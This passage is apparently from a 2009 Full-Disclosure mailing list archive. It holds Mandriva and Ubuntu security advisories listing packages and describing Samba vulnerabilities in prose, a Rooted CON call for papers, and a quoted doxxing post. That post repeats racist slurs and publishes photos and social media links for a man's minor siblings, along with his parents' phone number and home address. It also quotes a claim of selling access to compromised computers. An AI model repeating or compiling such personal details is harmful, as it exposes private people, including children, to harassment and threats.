2008.1/x86_64/lib64graphvizocaml0-2.16.1-3.2mdv2008.1.x86_64.rpm a9c4f5f562e98bd643650a3c47405c5a 2008.1/x86_64/lib64graphvizperl0-2.16.1-3.2mdv2008.1.x86_64.rpm 0085b4658e8a92da42d40fcd06bce41f 2008.1/x86_64/lib64graphvizphp0-2.16.1-3.2mdv2008.1.x86_64.rpm cb6596d38d763038ba3b6fd1b8f988d5 2008.1/x86_64/lib64graphvizpython0-2.16.1-3.2mdv2008.1.x86_64.rpm c50a7ea57991f13a11fb193d90bd1dad 2008.1/x86_64/lib64graphvizr0-2.16.1-3.2mdv2008.1.x86_64.rpm 448f2265d11265818ad703724c0b5c77 2008.1/x86_64/lib64graphvizruby0-2.16.1-3.2mdv2008.1.x86_64.rpm b03474eba03405827cca9ab99a77f517 2008.1/x86_64/lib64graphviz-static-devel-2.16.1-3.2mdv2008.1.x86_64.rpm ac8c9dacf5f7d8262de0e7d9a803a38a 2008.1/x86_64/lib64graphviztcl0-2.16.1-3.2mdv2008.1.x86_64.rpm e1ec78ea74f83f3a76bf3a2840634612 2008.1/SRPMS/graphviz-2.16.1-3.2mdv2008.1.src.rpm Mandriva Linux 2009.0: cd40ad7b987be4017fc17321ef2d9db3 2009.0/i586/graphviz-2.20.2-3.1mdv2009.0.i586.rpm 16f9bf10cf8fc2703fa9c545501a60f3 2009.0/i586/graphviz-doc-2.20.2-3.1mdv2009.0.i586.rpm bbd99a51776c7635cc2fb1e6504ab660 2009.0/i586/libgraphviz4-2.20.2-3.1mdv2009.0.i586.rpm 4c51fd7007ad75990da2326a9be1f79b 2009.0/i586/libgraphviz-devel-2.20.2-3.1mdv2009.0.i586.rpm 1ced8591094aa6383aace1dc597c1b31 2009.0/i586/libgraphvizlua0-2.20.2-3.1mdv2009.0.i586.rpm 58c7888f5b8f6753fe8b9ecd2e96263c 2009.0/i586/libgraphvizocaml0-2.20.2-3.1mdv2009.0.i586.rpm 04e0d0f072c05a00c88d58ad773ae71f 2009.0/i586/libgraphvizperl0-2.20.2-3.1mdv2009.0.i586.rpm fd140078c0bd81fb7a91840626e6d73b 2009.0/i586/libgraphvizphp0-2.20.2-3.1mdv2009.0.i586.rpm 846a760fa83a380d433efec24e5029a3 2009.0/i586/libgraphvizpython0-2.20.2-3.1mdv2009.0.i586.rpm 0f700d07ec8319159a1547817774bce8 2009.0/i586/libgraphvizr0-2.20.2-3.1mdv2009.0.i586.rpm a00118be4bd5394a3bcf31a50032d7a3 2009.0/i586/libgraphvizruby0-2.20.2-3.1mdv2009.0.i586.rpm 3a47386cf382a64de356a16bd0a3b7fb 2009.0/i586/libgraphviz-static-devel-2.20.2-3.1mdv2009.0.i586.rpm d24a69b5d1960562e621c4618f98e072 2009.0/i586/libgraphviztcl0-2.20.2-3.1mdv2009.0.i586.rpm 24fccd7d4adb0a5625e71bc5437355aa 2009.0/SRPMS/graphviz-2.20.2-3.1mdv2009.0.src.rpm Mandriva Linux 2009.0/X86_64: b430e14520a0f51eb0a95b5e33701741 2009.0/x86_64/graphviz-2.20.2-3.1mdv2009.0.x86_64.rpm 341a88027fdc05164c91afc9bbc457c2 2009.0/x86_64/graphviz-doc-2.20.2-3.1mdv2009.0.x86_64.rpm 4e27716eb9de736e0bec24b4531bcd15 2009.0/x86_64/lib64graphviz4-2.20.2-3.1mdv2009.0.x86_64.rpm 3b4e1362f89ca92e6f33a5967c8f56e3 2009.0/x86_64/lib64graphviz-devel-2.20.2-3.1mdv2009.0.x86_64.rpm a809b129e4d25356c43fa0149cdab5f7 2009.0/x86_64/lib64graphvizlua0-2.20.2-3.1mdv2009.0.x86_64.rpm eeb3736d03ab2c010d1475383c3bdb45 2009.0/x86_64/lib64graphvizocaml0-2.20.2-3.1mdv2009.0.x86_64.rpm 65a02975aec2bdd4e7a7a15348fbb91b 2009.0/x86_64/lib64graphvizperl0-2.20.2-3.1mdv2009.0.x86_64.rpm ae97101a210b04b42bdd6528ed9f3ccc 2009.0/x86_64/lib64graphvizphp0-2.20.2-3.1mdv2009.0.x86_64.rpm cb6690c8c20d614a4efc95b4938bcc1d 2009.0/x86_64/lib64graphvizpython0-2.20.2-3.1mdv2009.0.x86_64.rpm 60fd79709c361adc99a994046183e808 2009.0/x86_64/lib64graphvizr0-2.20.2-3.1mdv2009.0.x86_64.rpm 17d52b449c8cb552b07d9ec8b7546dab 2009.0/x86_64/lib64graphvizruby0-2.20.2-3.1mdv2009.0.x86_64.rpm 2107cfc119bf716592cde2d9ccb5a278 2009.0/x86_64/lib64graphviz-static-devel-2.20.2-3.1mdv2009.0.x86_64.rpm 22d50187ae34b3fe4fc6e5a56e03cf6e 2009.0/x86_64/lib64graphviztcl0-2.20.2-3.1mdv2009.0.x86_64.rpm 24fccd7d4adb0a5625e71bc5437355aa 2009.0/SRPMS/graphviz-2.20.2-3.1mdv2009.0.src.rpm Corporate 4.0: 220a090c70ece0be9301c7fbba8eeafb corporate/4.0/i586/graphviz-2.2.1-3.2.20060mdk.i586.rpm 0306b02d2da0dcf568eda62d161c05a3 corporate/4.0/i586/libgraphviz7-2.2.1-3.2.20060mdk.i586.rpm 2a81ab84c226d920922b83e0008c0639 corporate/4.0/i586/libgraphviz7-devel-2.2.1-3.2.20060mdk.i586.rpm 28a0cc74c0741472ad13972e7e37b0fb corporate/4.0/i586/libgraphviztcl7-2.2.1-3.2.20060mdk.i586.rpm 8da2d3fa3550dfedcbdf0a9eca17ce23 corporate/4.0/i586/libgraphviztcl7-devel-2.2.1-3.2.20060mdk.i586.rpm b6944d7913771bce2e3e8c2fb7175747 corporate/4.0/SRPMS/graphviz-2.2.1-3.2.20060mdk.src.rpm Corporate 4.0/X86_64: 9b8bb3fc39eb7c4019d93adabb9f32b7 corporate/4.0/x86_64/graphviz-2.2.1-3.2.20060mdk.x86_64.rpm b4217c99d65439f37ce74bb396379d26 corporate/4.0/x86_64/lib64graphviz7-2.2.1-3.2.20060mdk.x86_64.rpm cc3677da3e06a39066d940e69f71169a corporate/4.0/x86_64/lib64graphviz7-devel-2.2.1-3.2.20060mdk.x86_64.rpm a20c4bc6c864d1ec2f2e1df0c0c6bb52 corporate/4.0/x86_64/lib64graphviztcl7-2.2.1-3.2.20060mdk.x86_64.rpm 98f1e52d3b1cc53f18bb50b2d026f177 corporate/4.0/x86_64/lib64graphviztcl7-devel-2.2.1-3.2.20060mdk.x86_64.rpm b6944d7913771bce2e3e8c2fb7175747 corporate/4.0/SRPMS/graphviz-2.2.1-3.2.20060mdk.src.rpm Mandriva Enterprise Server 5: 62ee712cf5d3db3cdc3d89cbaea5a8ef mes5/i586/graphviz-2.20.2-3.1mdvmes5.i586.rpm cc53ce2980bbc9230c47e9f577dc96e6 mes5/i586/graphviz-doc-2.20.2-3.1mdvmes5.i586.rpm 9c3280147b3ed5269eb8f3639b3797ac mes5/i586/libgraphviz4-2.20.2-3.1mdvmes5.i586.rpm 4d76154866151b9e1c9950bd9e696079 mes5/i586/libgraphviz-devel-2.20.2-3.1mdvmes5.i586.rpm 290871c8685f212d550630883d21a3c1 mes5/i586/libgraphvizlua0-2.20.2-3.1mdvmes5.i586.rpm 75da3b25645fd179cd1b09c7f7f5b1a6 mes5/i586/libgraphvizocaml0-2.20.2-3.1mdvmes5.i586.rpm c7fa737414c85c02f1b1773bd9251123 mes5/i586/libgraphvizperl0-2.20.2-3.1mdvmes5.i586.rpm 5f6e94e5805938ae3db0a0f40352bbc8 mes5/i586/libgraphvizphp0-2.20.2-3.1mdvmes5.i586.rpm 70bcd1a23e310ec99243f01fbd961580 mes5/i586/libgraphvizpython0-2.20.2-3.1mdvmes5.i586.rpm bd47754ee30d40320747d3f49e0e7379 mes5/i586/libgraphvizr0-2.20.2-3.1mdvmes5.i586.rpm 0c958b24c47c0490dcef2f02f14b9dfc mes5/i586/libgraphvizruby0-2.20.2-3.1mdvmes5.i586.rpm 8d7fc25bbe7bae9b6f3a30e804e194ca mes5/i586/libgraphviz-static-devel-2.20.2-3.1mdvmes5.i586.rpm 504ba285c05399aed39bfd3e073efef3 mes5/i586/libgraphviztcl0-2.20.2-3.1mdvmes5.i586.rpm deab8d3cf3d3385681981ddcae6f27f5 mes5/SRPMS/graphviz-2.20.2-3.1mdvmes5.src.rpm Mandriva Enterprise Server 5/X86_64: 52e6de0a8fed5ea15100f9db0fa89165 mes5/x86_64/graphviz-2.20.2-3.1mdvmes5.x86_64.rpm a41a1b7184b99e6cf39cbe4c472869d3 mes5/x86_64/graphviz-doc-2.20.2-3.1mdvmes5.x86_64.rpm 20aec37af8e1e0ed35252c0946146bb4 mes5/x86_64/lib64graphviz4-2.20.2-3.1mdvmes5.x86_64.rpm f64c7fbba5f6013bf85d7fc0cbe08b8e mes5/x86_64/lib64graphviz-devel-2.20.2-3.1mdvmes5.x86_64.rpm 9231a34114cd21170548ad956dbceac8 mes5/x86_64/lib64graphvizlua0-2.20.2-3.1mdvmes5.x86_64.rpm 35decda2e828878b50e89412abec4452 mes5/x86_64/lib64graphvizocaml0-2.20.2-3.1mdvmes5.x86_64.rpm cc55ea4aeebbb1407c0545396c13e690 mes5/x86_64/lib64graphvizperl0-2.20.2-3.1mdvmes5.x86_64.rpm b44aaa3e7b0815a977c1ec2baab022fe mes5/x86_64/lib64graphvizphp0-2.20.2-3.1mdvmes5.x86_64.rpm b5b201cafa894a5cfcd52591d69f5a5e mes5/x86_64/lib64graphvizpython0-2.20.2-3.1mdvmes5.x86_64.rpm ae7c9ddf53031238aad61102d988d0c0 mes5/x86_64/lib64graphvizr0-2.20.2-3.1mdvmes5.x86_64.rpm 14ee645f24b5a73245bb956b225731ec mes5/x86_64/lib64graphvizruby0-2.20.2-3.1mdvmes5.x86_64.rpm 2c9bc7399ef37e5ea4166a43bb595ffe mes5/x86_64/lib64graphviz-static-devel-2.20.2-3.1mdvmes5.x86_64.rpm b238a236ff9db01dca40e37e87c30304 mes5/x86_64/lib64graphviztcl0-2.20.2-3.1mdvmes5.x86_64.rpm deab8d3cf3d3385681981ddcae6f27f5 mes5/SRPMS/graphviz-2.20.2-3.1mdvmes5.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFKxMaAmqjQ0CJFipgRAuQlAJoDTqDq5rg6FU+iVE7+f+dbzyAzFACeLU5Z bKt0b1Yn9jvoKvPVqNAjk28= =i+6O -----END PGP SIGNATURE----- From notshadowgamers at googlemail.com Thu Oct 1 19:32:50 2009 From: notshadowgamers at googlemail.com (Probably Shadowgamers) Date: Thu, 1 Oct 2009 19:32:50 +0100 Subject: [Full-disclosure] So weev... In-Reply-To: References: <20091001171449.8C18828037@smtp.hushmail.com> Message-ID: Because the internet is very serious business. :V On 10/1/09, Freddie Vicious wrote: > And we should give a damn because? > > On Thu, Oct 1, 2009 at 10:14 AM, Wintermute wrote: > >> -----BEGIN PGP SIGNED MESSAGE----- >> Hash: SHA1 >> >> How does it feel to be a hypocrite? And we quote: >> >> 22:02 im all for white people cleaning up the nigger problem >> 22:03 i hate niggers >> 22:03 i hate niggers. >> >> Now besides the fact that weev is an annoying little bitch who >> cannot seem to find better things to do with his time than augment >> his racist troll persona, there is a larger irony here: he has two >> younger siblings who are black. Not that we the undersigned have a >> problem with this, but our spidey sense tells us that weev does not >> want you to know. Thus, let us present... >> >> Chelsea and Anthony Auernheimer! Chelsea started as a college >> freshman this year. She is smart and she loves animals. More about >> Chelsea: >> >> http://www.zinch.com/z/Nouchii >> http://timesdispatch.mycapture.com/mycapture/enlarge.asp?image=23447 >> 816&event=745571&CategoryID=20789 (pic) >> >> Anthony is a 9th grader. You can follow him on Twitter here: >> http://twitter.com/Antsauercool. As a picture is also in order for >> him: >> http://timesdispatch.mycapture.com/mycapture/enlarge.asp?image=23447 >> 820&event=745571&CategoryID=20789 >> >> Now, we would love to know what these two think of their racist >> asshole brother, but have had the common courtesy not to bother >> them with our query. We did, however, more than momentarily >> entertain the idea of getting in touch with weev's parents to >> attempt to discover what has made him the way he is. Weev's mother >> (http://imgur.com/AQpSd.jpg) is a board member of the Richmond PTA >> and made contributions to the Democratic Party last year. She seems >> like a nice person. His father (http://imgur.com/CEaNX.jpg), on the >> other hand, is in his mid 40's, has been CEO of Sealpac USA for the >> last two years, and is by all accounts a great guy. Either parent >> is available for comment at (804) 355-2889. If you would prefer >> postal correspondence, letters can be mailed to: >> >> 2038 W Grace St >> Richmond, VA 23220 >> >> Now, being the troll that he is, weev has no problem with living a >> lie. His recent claim, >> >> > As I said, I haven't ever committed a crime. I am a truly sinless >> man. >> >> ...is humorous when compared with this admission, delivered while >> smoking moonrocks: >> >> 15:05 does anybody know these russians >> 15:06 that they are buying up hacked macs for 43 cents an >> install >> 15:26 i have access to like >> 15:26 8k rooted macs >> 15:26 right now >> 15:26 and i would like to make a quick $3500 >> >> But we cannot really blame the guy. Our hearts goes out to him when >> we see admissions such as this: >> >> 09:50 i gotta get some money >> 09:50 my cashflow sucks >> 09:51 whores >> 09:51 lavish cars >> 09:51 gigantic places to live >> >> Actually, scratch that. We just kind of LOL at the iProphet and >> imagine him LOLing back. >> >> And that is all well and good. Standard operating procedure in the >> life of a troll, along with playing some Sims, getting high with >> whatever psychoactives he can get his grubby paws on, making stupid >> videos, and generally proving that he does not know what the fuck >> he is doing with his life. Is weev's current life better than his >> past attempt at freelance web and graphic design? Maybe. He kinda >> sucked at that too. But come on, man, at least aspire to >> *something*. >> >> Weev, the joke is old. Your number is up. Shut up or shape up. Your >> docs have been pulled. We are ready to drop them at a moment's >> notice, but we momentarily stop to wonder if it would even be worth >> it. The devil is in the details, and yours have cocked the gun that >> has been aimed at your foot for a while. Karma has more butthurt >> waiting for you (in the form of "us") than you know what to do >> with. Oh, and a representative in Anaheim has been alerted and will >> be handling this case personally. >> >> We are, as always, the collective. An agent is standing by to >> assist you with any contentions, queries, or comments resulting >> from this transmission. >> >> WINTERMUTE >> -----BEGIN PGP SIGNATURE----- >> Charset: UTF8 >> Version: Hush 3.0 >> Note: This signature can be verified at https://www.hushtools.com/verify >> >> wpwEAQMCAAYFAkrE44kACgkQAN7xmh8YPB2wrQP/QNzi1E+IfPvbVJr6wsxs9+wjknqe >> Qc3UAC6hSW3xPB7kwDR9g9i0WUhCjlMO9f78YXDkW0xqJ33FWhpj0zQHwmtOp7rMSXie >> MeeHIihWf/T5tcPBgNPOqFIqjIWm/GiGcQXrn7Ifmd2+lDZ3vf9nK2/lsgSUyPqPVtge >> 20blkg8= >> =JvuW >> -----END PGP SIGNATURE----- >> >> _______________________________________________ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ >> > > > > -- > Best wishes, > Freddie Vicious > http://twitter.com/viciousf > From roman at rs-labs.com Thu Oct 1 19:34:23 2009 From: roman at rs-labs.com (Roman Medina-Heigl Hernandez) Date: Thu, 01 Oct 2009 20:34:23 +0200 Subject: [Full-disclosure] Rooted CON 2010 - CFP Message-ID: <4AC4F62F.7030204@rs-labs.com> =============================== - Rooted CON 2010 - C A L L F O R P A P E R S =============================== .: [ ABOUT ] Rooted CON is a Security Congress to be held in Madrid (Spain) on March 2010. Our goal is to promote security by offering highly technical talks with a practical approach (interesant mix of theory / demos) and neutrality (although we want businesses/enterprises to participate in the congress, they should prioritize the technical and objective approach). We also want people to participate and enjoy... And even come back home with a prize! Therefore, we will hold various events (apart from talks), one of the most important of them being the CTF ("Capture the flag") contest, with substantial cash prizes and been designed by none other than one of the "Sexy Pandas" (finalist team in the traditional "Defcon" CTF). And of course if you are brave enough you will also have fun by living the beautiful nights of Madrid... .: [ FORMAT ] We would like to receive two kind of proposals: - fast talks. Duration: 20'. - normal talks. Duration: 50'. If you have a crazy/interesting and fresh idea that could be summarized in fewer time, please don't hesitate and submit a fast talk. If your idea is even crazier and need more time to be explained in depth, use the second one: normal talk. We are only accepting submissions in Spanish and English language. We will do our best to have simultaneous translation in the conference room but we cannot promise it since it will depend on budget and sponsors. .: [ TOPICS ] Every hot topic in the security market is welcome. These are only some examples: - innovative defensive and offensive techniques. - everything related to fraud, phishing, trojan horses in financial entities, protection mechanisms and technologies... - "reversing", low-level techniques, kernel, ... - vulnerabilities discovery, "fuzzing" and related topics. - virtual contexts attacks, clusters, "cloud computing" and new "in the cloud" products. - cryptography and cryptanalysis. - mobile security. - hacking tools: custom developments. - document security. - VoIP, phreaking, ... - forensics / antiforensics. - wireless security. - steganography and covert channels. - web applications security - ... .: [ SUBMISSION PROCEDURE ] Would you like to speak at Rooted CON? Please, don't forget to make talks illustrative and include demos! :) Please, send your application via e-mail to: cfp -AT- rootedcon.es For the talk to be accepted in the initial selection process it should comply with the previously described format and *must* include *all* the following info: - title - author (full name and optionally nick/handle) - bio (some lines defining who you are) - duration (normal or fast talk?) - abstract (should be sufficiently extensive for being correctly evaluated) - location/nationality - facilities needed - do you plan to present same or similar talk in another conference? Which one? .: [ SCHEDULE ] October 1, 2009 - CFP opens. December 20, 2009 - CFP closes. December 31, 2009 - Speakers selected. January 10, 2010 - Final paper and presentation material submitted. .: [ SPEAKER PRIVILEGES ] Speakers will be given the following benefits: - Free accommodation. - Free access to the conference. - Travel expenses (if possible). - Free party tickets/drinks. .: [ SPONSORS ] There are still opportunities to help us in organizing the best security congress in Spain while obtaining an interesting marketing ROI. If you are interested in being one of our sponsors, please, contact us at: sponsors -AT- rootedcon.es .: [ LINKS ] - Web site http://www.rootedcon.es/ - Facebook group http://www.facebook.com/group.php?gid=96410924798 - LinkedIn group http://www.linkedin.com/groups?gid=1969438 - Announce mailing-list https://listas.rootedcon.es/mailman/listinfo/rooted-announce -=EOF=- -- Rooted CON staff From marc.deslauriers at canonical.com Thu Oct 1 20:41:08 2009 From: marc.deslauriers at canonical.com (Marc Deslauriers) Date: Thu, 01 Oct 2009 15:41:08 -0400 Subject: [Full-disclosure] [USN-839-1] Samba vulnerabilities Message-ID: <1254426068.4755.19.camel@mdlinux.technorage.com> =========================================================== Ubuntu Security Notice USN-839-1 October 01, 2009 samba vulnerabilities CVE-2009-1886, CVE-2009-1888, CVE-2009-2813, CVE-2009-2906, CVE-2009-2948 =========================================================== A security issue affects the following Ubuntu releases: Ubuntu 6.06 LTS Ubuntu 8.04 LTS Ubuntu 8.10 Ubuntu 9.04 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 6.06 LTS: samba 3.0.22-1ubuntu3.9 smbfs 3.0.22-1ubuntu3.9 Ubuntu 8.04 LTS: samba 3.0.28a-1ubuntu4.9 smbfs 3.0.28a-1ubuntu4.9 Ubuntu 8.10: samba 2:3.2.3-1ubuntu3.6 smbclient 2:3.2.3-1ubuntu3.6 smbfs 2:3.2.3-1ubuntu3.6 Ubuntu 9.04: samba 2:3.3.2-1ubuntu3.2 smbfs 2:3.3.2-1ubuntu3.2 In general, a standard system upgrade is sufficient to effect the necessary changes. Details follow: J. David Hester discovered that Samba incorrectly handled users that lack home directories when the automated [homes] share is enabled. An authenticated user could connect to that share name and gain access to the whole filesystem. (CVE-2009-2813) Tim Prouty discovered that the smbd daemon in Samba incorrectly handled certain unexpected network replies. A remote attacker could send malicious replies to the server and cause smbd to use all available CPU, leading to a denial of service. (CVE-2009-2906) Ronald Volgers discovered that the mount.cifs utility, when installed as a setuid program, would not verify user permissions before opening a credentials file. A local user could exploit this to use or read the contents of unauthorized credential files. (CVE-2009-2948) Reinhard Ni?l discovered that the smbclient utility contained format string vulnerabilities in its file name handling. Because of security features in Ubuntu, exploitation of this vulnerability is limited. If a user or automated system were tricked into processing a specially crafted file name, smbclient could be made to crash, possibly leading to a denial of service. This only affected Ubuntu 8.10. (CVE-2009-1886) Jeremy Allison discovered that the smbd daemon in Samba incorrectly handled permissions to modify access control lists when dos filemode is enabled. A remote attacker could exploit this to modify access control lists. This only affected Ubuntu 8.10 and Ubuntu 9.04. (CVE-2009-1886) Updated packages for Ubuntu 6.06 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/s/samba/samba_3.0.22-1ubuntu3.9.diff.gz Size/MD5: 161616 0ad9aaba168245042d1489fdcdd5dc42 http://security.ubuntu.com/ubuntu/pool/main/s/samba/samba_3.0.22-1ubuntu3.9.dsc Size/MD5: 1203 e54ed933c8b093c77b7aecaccc1650ab http://security.ubuntu.com/ubuntu/pool/main/s/samba/samba_3.0.22.orig.tar.gz Size/MD5: 17542657 5c39505af17cf5caf3d6ed8bab135036 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/s/samba/samba-doc-pdf_3.0.22-1ubuntu3.9_all.deb Size/MD5: 6594720 714f26b307bf9c1d81392ef89dd57420 http://security.ubuntu.com/ubuntu/pool/main/s/samba/samba-doc_3.0.22-1ubuntu3.9_all.deb Size/MD5: 6902292 116d5fcbf539e39460c4de1a03a2e5f1 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/s/samba/libpam-smbpass_3.0.22-1ubuntu3.9_amd64.deb Size/MD5: 427020 eac8d7f26dbbe0a51eb6dd2089d5318f http://security.ubuntu.com/ubuntu/pool/main/s/samba/libsmbclient-dev_3.0.22-1ubuntu3.9_amd64.deb Size/MD5: 112902 78153d8ae792d0dad9913142ac80f304 http://security.ubuntu.com/ubuntu/pool/main/s/samba/libsmbclient_3.0.22-1ubuntu3.9_amd64.deb Size/MD5: 798804 51db5cb3445e03ce20bc01df763626f0 http://security.ubuntu.com/ubuntu/pool/main/s/samba/python2.4-samba_3.0.22-1ubuntu3.9_amd64.deb Size/MD5: 5974858 2984a44edeff38950c8b117ee5dfc50d http://security.ubuntu.com/ubuntu/pool/main/s/samba/samba-common_3.0.22-1ubuntu3.9_amd64.deb Size/MD5: 2415334 5a7e0073ee7714fa816d528ec7015e98 http://security.ubuntu.com/ubuntu/pool/main/s/samba/samba-dbg_3.0.22-1ubuntu3.9_amd64.deb Size/MD5: 11893670 e9a72bdd6da691c06755694781c28cf0 http://security.ubuntu.com/ubuntu/pool/main/s/samba/samba_3.0.22-1ubuntu3.9_amd64.deb Size/MD5: 3405114 c3db6785e7e379912107194b85a6c4c0 http://security.ubuntu.com/ubuntu/pool/main/s/samba/smbclient_3.0.22-1ubuntu3.9_amd64.deb Size/MD5: 4042974 5b6d291f233ea349113f188c8b602922 http://security.ubuntu.com/ubuntu/pool/main/s/samba/smbfs_3.0.22-1ubuntu3.9_amd64.deb Size/MD5: 450162 973bba455c72ac8f68c5266f4f6962c5 http://security.ubuntu.com/ubuntu/pool/main/s/samba/swat_3.0.22-1ubuntu3.9_amd64.deb Size/MD5: 833738 7a32896e5bbbed676eb7d670b7b5c913 http://security.ubuntu.com/ubuntu/pool/main/s/samba/winbind_3.0.22-1ubuntu3.9_amd64.deb Size/MD5: 1931042 3da6192d4e7d101613c5af8b3d29cddf i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/s/samba/libpam-smbpass_3.0.22-1ubuntu3.9_i386.deb Size/MD5: 366694 f14155bac141ad7f941ba03e393c5270 http://security.ubuntu.com/ubuntu/pool/main/s/samba/libsmbclient-dev_3.0.22-1ubuntu3.9_i386.deb Size/MD5: 112902 967c4537a0883400f4ee836d32b1acea http://security.ubuntu.com/ubuntu/pool/main/s/samba/libsmbclient_3.0.22-1ubuntu3.9_i386.deb Size/MD5: 683712 002366bd9b55bd6a9e5b01482a03e532 http://security.ubuntu.com/ubuntu/pool/main/s/samba/python2.4-samba_3.0.22-1ubuntu3.9_i386.deb Size/MD5: 5068740 85a5168913d149757470d9604a132b8c http://security.ubuntu.com/ubuntu/pool/main/s/samba/samba-common_3.0.22-1ubuntu3.9_i386.deb Size/MD5: 2078578 5eb6ccc70dc94c0f04879d46d047b52e http://security.ubuntu.com/ubuntu/pool/main/s/samba/samba-dbg_3.0.22-1ubuntu3.9_i386.deb Size/MD5: 9811828 e6daf862bdf89a5b2ae0e10b6ec7d46b http://security.ubuntu.com/ubuntu/pool/main/s/samba/samba_3.0.22-1ubuntu3.9_i386.deb Size/MD5: 2852250 ce15a3ffa8bb74c1668e2e84af25f395 http://security.ubuntu.com/ubuntu/pool/main/s/samba/smbclient_3.0.22-1ubuntu3.9_i386.deb Size/MD5: 3353974 b359d873da6d8f2fbefb017c56a90d69 http://security.ubuntu.com/ubuntu/pool/main/s/samba/smbfs_3.0.22-1ubuntu3.9_i386.deb Size/MD5: 380190 25564c8fcbe3748d89352c3889224a38 http://security.ubuntu.com/ubuntu/pool/main/s/samba/swat_3.0.22-1ubuntu3.9_i386.deb Size/MD5: 711802 a3ea954b28c3b650e2a48672d6944205 http://security.ubuntu.com/ubuntu/pool/main/s/samba/winbind_3.0.22-1ubuntu3.9_i386.deb Size/MD5: 1609834 7b3072248ab3b89584205aa234ccf555 powerpc architecture (Apple Macintosh G3/G4/G5): http://security.ubuntu.com/ubuntu/pool/main/s/samba/libpam-smbpass_3.0.22-1ubuntu3.9_powerpc.deb Size/MD5: 410852 ef7fe6cfe269a839e44f3cf538d4ae38 http://security.ubuntu.com/ubuntu/pool/main/s/samba/libsmbclient-dev_3.0.22-1ubuntu3.9_powerpc.deb Size/MD5: 112916 90aeed1dcdfc40442543b79b4c960027 http://security.ubuntu.com/ubuntu/pool/main/s/samba/libsmbclient_3.0.22-1ubuntu3.9_powerpc.deb Size/MD5: 777048 32b63354cd4ea69407f715a690f51856 http://security.ubuntu.com/ubuntu/pool/main/s/samba/python2.4-samba_3.0.22-1ubuntu3.9_powerpc.deb Size/MD5: 5693046 1903d9ec97fc80bf7ec844f0840b41ed http://security.ubuntu.com/ubuntu/pool/main/s/samba/samba-common_3.0.22-1ubuntu3.9_powerpc.deb Size/MD5: 2359372 18c86a2b1c6ab25a370c2cdbd6661ead http://security.ubuntu.com/ubuntu/pool/main/s/samba/samba-dbg_3.0.22-1ubuntu3.9_powerpc.deb Size/MD5: 11903932 d04b1ea8aee57ae0df5c29756c2c3b5a http://security.ubuntu.com/ubuntu/pool/main/s/samba/samba_3.0.22-1ubuntu3.9_powerpc.deb Size/MD5: 3334618 7667bd29d3beb55a97e5a3b5577ecd41 http://security.ubuntu.com/ubuntu/pool/main/s/samba/smbclient_3.0.22-1ubuntu3.9_powerpc.deb Size/MD5: 3942780 9d951c0722867033b8281e1866fcba24 http://security.ubuntu.com/ubuntu/pool/main/s/samba/smbfs_3.0.22-1ubuntu3.9_powerpc.deb Size/MD5: 443270 b7f93c04656c39aa3dcbafc53ce0fa05 http://security.ubuntu.com/ubuntu/pool/main/s/samba/swat_3.0.22-1ubuntu3.9_powerpc.deb Size/MD5: 814458 10be46698881dd3c2cbc9a55a34d214d http://security.ubuntu.com/ubuntu/pool/main/s/samba/winbind_3.0.22-1ubuntu3.9_powerpc.deb Size/MD5: 1873756 4d919e6bf376e316a6195bfe5aae1a97 sparc architecture (Sun SPARC/UltraSPARC): http://security.ubuntu.com/ubuntu/pool/main/s/samba/libpam-smbpass_3.0.22-1ubuntu3.9_sparc.deb Size/MD5: 389762 dcc58f618c5dc2199ff041aeedd71d98 http://security.ubuntu.com/ubuntu/pool/main/s/samba/libsmbclient-dev_3.0.22-1ubuntu3.9_sparc.deb Size/MD5: 112918 27c0500abe2141de9472fc5dcb379a97 http://security.ubuntu.com/ubuntu/pool/main/s/samba/libsmbclient_3.0.22-1ubuntu3.9_sparc.deb Size/MD5: 730528 fd413b1753a90c741cdbf767cf4c6a4b http://security.ubuntu.com/ubuntu/pool/main/s/samba/python2.4-samba_3.0.22-1ubuntu3.9_sparc.deb Size/MD5: 5427026 af95ac20b0047a3fd4c640d8536b950a http://security.ubuntu.com/ubuntu/pool/main/s/samba/samba-common_3.0.22-1ubuntu3.9_sparc.deb Size/MD5: 2145644 843c984664f3e644252ea6cdfddcb7d4 http://security.ubuntu.com/ubuntu/pool/main/s/samba/samba-dbg_3.0.22-1ubuntu3.9_sparc.deb Size/MD5: 9723658 2639550c026db54b4bc5686e896dd510 http://security.ubuntu.com/ubuntu/pool/main/s/samba/samba_3.0.22-1ubuntu3.9_sparc.deb Size/MD5: 2993030 8260ac9ace47cc8767b6935c2b3ef5ec http://security.ubuntu.com/ubuntu/pool/main/s/samba/smbclient_3.0.22-1ubuntu3.9_sparc.deb Size/MD5: 3508094 5c0ac997e1d96052f31b24fd1188a26f http://security.ubuntu.com/ubuntu/pool/main/s/samba/smbfs_3.0.22-1ubuntu3.9_sparc.deb Size/MD5: 400114 c4cef7889ece3a02aa7b59dd56b7a544 http://security.ubuntu.com/ubuntu/pool/main/s/samba/swat_3.0.22-1ubuntu3.9_sparc.deb Size/MD5: 737168 42111d78eb3502791890f93c18d9b3bf http://security.ubuntu.com/ubuntu/pool/main/s/samba/winbind_3.0.22-1ubuntu3.9_sparc.deb Size/MD5: 1691634 30bf9470299d7414a3874c2a8adae78d Updated packages for Ubuntu 8.04 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/s/samba/samba_3.0.28a-1ubuntu4.9.diff.gz Size/MD5: 231391 7e2af7f7d745cc77c330ee843679d8ca http://security.ubuntu.com/ubuntu/pool/main/s/samba/samba_3.0.28a-1ubuntu4.9.dsc Size/MD5: 1586 